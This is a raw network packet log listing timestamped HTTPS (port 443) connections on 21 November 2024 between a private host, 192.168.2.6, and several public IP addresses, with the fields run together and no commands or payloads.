                                                                                                                                                                        Nov 21, 2024 10:37:22.647542953 CET49731443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.647762060 CET49731443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.647789955 CET4434973113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.794850111 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.795011044 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:22.797931910 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:22.797943115 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.798233032 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.813980103 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:22.854309082 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:22.854327917 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.990684032 CET49732443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:22.990777969 CET4434973240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.990901947 CET49732443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:23.005460978 CET49732443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:23.005506039 CET4434973240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.267169952 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                        Nov 21, 2024 10:37:23.267173052 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                        Nov 21, 2024 10:37:23.486887932 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.486969948 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.487026930 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.487030983 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.487047911 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.487088919 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.487093925 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.487138987 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.487178087 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.487181902 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.495219946 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.495266914 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.495274067 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.495282888 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.495340109 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.503693104 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.548396111 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.548412085 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.595280886 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                        Nov 21, 2024 10:37:23.595303059 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.606370926 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.657768965 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.687918901 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.688033104 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.688077927 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.688103914 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.688194036 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.688235044 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.688379049 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.688394070 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.688405991 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.688411951 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.856089115 CET49733443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.856128931 CET44349733188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:23.856216908 CET49733443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.856635094 CET49733443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:23.856652021 CET44349733188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.239078999 CET4434972713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.239845991 CET49727443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.239860058 CET4434972713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.240228891 CET49727443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.240233898 CET4434972713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.285270929 CET4434972813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.285909891 CET49728443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.285921097 CET4434972813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.286501884 CET49728443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.286506891 CET4434972813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.359623909 CET4434973013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.360516071 CET49730443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.360551119 CET4434973013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.361057997 CET49730443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.361069918 CET4434973013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.428468943 CET4434972913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.429055929 CET49729443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.429094076 CET4434972913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.429497957 CET49729443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.429506063 CET4434972913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.431751966 CET4434973113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.431999922 CET49731443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.432019949 CET4434973113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.432347059 CET49731443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.432353020 CET4434973113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.673146963 CET4434972713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.673319101 CET4434972713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.674019098 CET49727443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.674084902 CET49727443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.674084902 CET49727443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.674093008 CET4434972713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.674103022 CET4434972713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.676820993 CET49734443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.676913023 CET4434973413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.677046061 CET49734443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.677198887 CET49734443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.677231073 CET4434973413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.728868961 CET4434972813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.728924990 CET4434972813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.729063034 CET49728443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.729285955 CET49728443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.729285955 CET49728443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.729305983 CET4434972813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.729317904 CET4434972813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.731997013 CET49735443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.732028961 CET4434973513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.732121944 CET49735443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.732260942 CET49735443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.732270002 CET4434973513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.803277016 CET4434973013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.803363085 CET4434973013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.803472996 CET49730443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.809536934 CET49730443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.809557915 CET4434973013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.809636116 CET49730443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.809644938 CET4434973013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.812292099 CET49736443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.812370062 CET4434973613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.813409090 CET49736443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.813548088 CET49736443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.813582897 CET4434973613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.880610943 CET4434973240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.880764008 CET49732443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:24.881289005 CET4434972913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.881454945 CET4434972913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.882249117 CET4434973113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.882340908 CET49729443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.882404089 CET4434973113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.882433891 CET49729443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.882457018 CET4434972913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.882473946 CET49729443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.882473946 CET49731443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.882484913 CET4434972913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.882800102 CET49732443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:24.882831097 CET4434973240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.882966042 CET49731443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.882966042 CET49731443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.882982969 CET4434973113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.882992029 CET4434973113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.883649111 CET4434973240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.885226011 CET49737443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.885242939 CET4434973713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.885374069 CET49737443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.885396957 CET49738443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.885440111 CET4434973813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.885489941 CET49738443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.885782957 CET49737443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.885793924 CET4434973713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.885879040 CET49738443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:24.885896921 CET4434973813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.886487007 CET49732443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:24.886533022 CET49732443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:24.886549950 CET4434973240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:24.886635065 CET49732443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:24.931371927 CET4434973240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:25.115255117 CET44349733188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:25.115377903 CET49733443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:25.116780996 CET49733443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:25.116791964 CET44349733188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:25.119082928 CET44349733188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:25.120348930 CET49733443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:25.120425940 CET49733443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:25.120454073 CET44349733188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:25.414659977 CET4434973240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:25.414891958 CET4434973240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:25.415330887 CET49732443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:25.415999889 CET49732443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:25.416019917 CET4434973240.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:25.416032076 CET49732443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:26.059175968 CET44349733188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.059293032 CET44349733188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.059442043 CET49733443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:26.060753107 CET49733443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:26.060771942 CET44349733188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.088644981 CET44349704173.222.162.64192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.088781118 CET49704443192.168.2.6173.222.162.64
                                                                                                                                                                        Nov 21, 2024 10:37:26.397842884 CET4434973413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.399336100 CET49734443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.399363041 CET4434973413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.399791956 CET49734443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.399797916 CET4434973413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.513402939 CET4434973513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.513959885 CET49735443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.513983965 CET4434973513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.514405966 CET49735443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.514415979 CET4434973513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.528177977 CET4434973613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.528923988 CET49736443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.528942108 CET4434973613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.529467106 CET49736443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.529474020 CET4434973613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.546185017 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:26.546219110 CET44349739188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.546299934 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:26.546610117 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:26.546622992 CET44349739188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.605659008 CET4434973713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.606184006 CET49737443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.606203079 CET4434973713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.606662989 CET49737443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.606667995 CET4434973713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.607085943 CET4434973813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.607614040 CET49738443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.607628107 CET4434973813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.607747078 CET49738443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.607749939 CET4434973813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.832884073 CET4434973413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.832951069 CET4434973413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.833020926 CET49734443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.833190918 CET49734443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.833190918 CET49734443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.833237886 CET4434973413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.833264112 CET4434973413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.836488008 CET49740443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.836529016 CET4434974013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.836587906 CET49740443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.836745977 CET49740443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.836760998 CET4434974013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.962992907 CET4434973613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.963082075 CET4434973613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.963215113 CET49736443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.963469982 CET49736443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.963469982 CET49736443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.963495016 CET4434973613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.963505030 CET4434973613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.964679956 CET4434973513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.964736938 CET4434973513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.964793921 CET49735443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.964904070 CET49735443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.964920998 CET4434973513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.964936972 CET49735443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.964943886 CET4434973513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.966545105 CET49741443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.966586113 CET4434974113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.966692924 CET49741443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.966808081 CET49742443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.966829062 CET4434974213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.966861963 CET49741443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.966891050 CET4434974113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:26.966892004 CET49742443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.967061043 CET49742443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:26.967070103 CET4434974213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.051510096 CET4434973813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.051595926 CET4434973813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.051652908 CET4434973713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.051763058 CET4434973713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.051769972 CET49738443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:27.051811934 CET49737443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:27.051897049 CET49738443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:27.051904917 CET49737443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:27.051914930 CET4434973813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.051920891 CET4434973713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.051934958 CET49737443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:27.051935911 CET49738443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:27.051940918 CET4434973713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.051943064 CET4434973813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.054698944 CET49743443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:27.054734945 CET4434974313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.054831028 CET49743443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:27.054975033 CET49743443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:27.054984093 CET4434974313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.055674076 CET49744443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:27.055701971 CET4434974413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.055764914 CET49744443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:27.055922031 CET49744443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:27.055934906 CET4434974413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.812650919 CET44349739188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.812787056 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:27.814040899 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:27.814049006 CET44349739188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.814353943 CET44349739188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.818512917 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:27.818634033 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:27.818671942 CET44349739188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:27.818734884 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:27.859342098 CET44349739188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.679975986 CET4434974013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.680740118 CET4434974213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.686017036 CET49740443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:28.686048031 CET4434974013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.686516047 CET49740443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:28.686522007 CET4434974013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.686748028 CET49742443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:28.686763048 CET4434974213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.687117100 CET49742443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:28.687122107 CET4434974213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.747509956 CET44349739188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.747647047 CET44349739188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.748366117 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:28.748366117 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:28.749815941 CET4434974113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.750308990 CET49741443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:28.750322104 CET4434974113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.750771999 CET49741443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:28.750785112 CET4434974113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.837130070 CET4434974313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.855253935 CET49743443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:28.855277061 CET4434974313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.855758905 CET49743443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:28.855767012 CET4434974313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:28.902848959 CET4434974413.107.246.60192.168.2.6
